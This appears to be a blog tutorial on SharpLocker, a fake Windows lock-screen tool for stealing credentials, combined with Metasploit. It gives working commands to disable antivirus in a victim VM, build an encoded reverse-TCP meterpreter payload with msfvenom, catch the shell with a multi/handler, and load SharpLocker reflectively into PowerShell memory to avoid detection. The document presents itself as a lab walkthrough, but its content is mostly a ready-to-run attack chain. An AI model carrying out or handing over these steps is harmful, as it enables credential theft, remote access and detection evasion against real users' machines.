SharpLocker
SharpLocker is a tool that helps hackers steal Windows credentials by popping up a fake Windows lock screen. All of the output is sent to the console which is works well with Cobalt Strike or Metasploit. This is a tool that can be injected into memory to avoid detection.
How to use SharpLocker with Metasploit
Suppose you have a foothold on a Windows machine that you are hacking and you want to attempt snagging the users credentials.
Assuming you have a meterpreter session running you can easily upload the SharpLocker.exe and execute the application.
Note: running the .exe is not the intended way of using SharpLocker. It’s supposed to be injected into memory and never touch disk, but this method does work. This could get detected by heuristic analysis. See the lab below for more details.
1 2 3 4 |
# meterpreter session upload SharpLocker.exe shell SharpLocker.exe |
At this point a screen should pop up that looks identical to a user logon screen.
When the user enters there password it will be put into the meterpreter session for you to use.
Let’s Look at the Source Code
To clone the GitHub repository you can run this command.
1 |
git clone https://github.com/Pickfordmatt/SharpLocker |
SharpLocker’s GitHub Repository
Full Walkthrough & Lab Setup
In this lab, I’m going to do this in a Windows environment using a Docker image of Parrot OS and run a Windows 10 Enterprise victim machine in Hyper-V. I wasn’t able to get this to work in Windows Sandbox (wouldn’t return password) so I decided to use a Hyper-V image.
I’ll also do things slightly differently than in the initial demo.
Attack Machine Firewall
Make sure you have ports 4444 and port 8080 open for traffic.
Windows 10 Enterprise Setup
Trial Windows 10 Enterprise Hyper-V
https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/
You will need to create a user or change the password of the default user in Windows 10.
For this demo, we will also disable the Anti Virus in the VM. Microsoft Security Essentials is quick to pick up meterpreter payloads. There are ways around this but that’s not what this tutorial is about. Focus!
Default Windows 10 Enterprise password is: “Passw0rd!”
Metasploit Listener in Parrot OS (Docker)
Being that I am a .NET developer, who loves Docker, I want to demonstrate this on Windows using a Docker image of Parrot OS.
1 2 3 4 5 6 7 8 9 |
# create a parrotos/work dir if you don't already have one... mkdir -p parrotos/work cd parrotos # go into work folder cd work # start parrotos from docker docker run --rm -it -v $PWD/work:/work -p 4444:4444 parrotsec/security |
Let me explain what some of these docker commands do.
–rm – removes the docker container when it’s exited.
-it – we’ll get an interactive terminal to the container
-v – a bind mount to map in our local parrotos/work folder to the container’s work folder on the root system.
-p 4444:4444 – maps host port 4444 to the containers port 4444.
-p 8080:8080 – maps host port 8080to the containers port 8080.
Start Metasploit Multi Handler to Catch the Shell
1 2 3 4 5 6 |
# start msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.0.12 set LPORT 4444 run |
Msfvenom Meterpreter Exploit
You’ll need to get your local IP address to your local lan for this demonstration.
1 2 |
# get local lan ip ipconfig |
1 2 3 4 5 6 7 8 |
# start parrotos from docker (2nd tab for msvenom) docker run --rm -it -v $PWD/work:/work -p 8080:8080 parrotsec/security # go into work folder cd work # generate meterpreter exploit msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp LHOST=192.168.0.12 LPORT=4444 -e x86/shikata_ga_nai -f exe > msf.exe |
For the sake of this demonstration, we’re just going to drop the meterpreter exploit onto the machine and run it so that we can get a hook back to our multi-handler.
I’m going to use the python3 built in webserver to drop the msf.exe. Make sure you are in the work folder.
1 2 |
# run python web server python3 -m http.server 8080 |
Stealing Creds with SharpLocker
In order to use SharpLocker with PowerShell, we’re going to need to make the class public. Well, this is the easy way, there are other ways.
Program.cs
Change “static class Program” to “public static class Program”.. and also change “static void Main()” to “public static void Main()”.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
namespace SharpLocker { public static class Program { /// <summary> /// The main entry point for the application. /// </summary> [STAThread] public static void Main() { Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); Application.Run(new LockScreenForm()); } } } |
Then recompile…
At this point, we should have a Metasploit session started. We’ll assume this is a hypothetical situation where we’ve established a foothold on a machine. Now, we can upload SharpLocker.exe and run it in the memory of PowerShell.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
# using first tab with multi handler meterpreter> shell upload SharpLocker.exe # get current directory pwd # returns - C:\Users\User\Downloads # load PowerShell extension load powershell powershell_execute [Reflection.Assembly]::LoadFile("C:\Users\User\Downloads\SharpLocker.exe") powershell_execute [SharpLocker.Program]::Main() |
I checked it in the Task Manager by hitting CTRL + ALT + DELETE.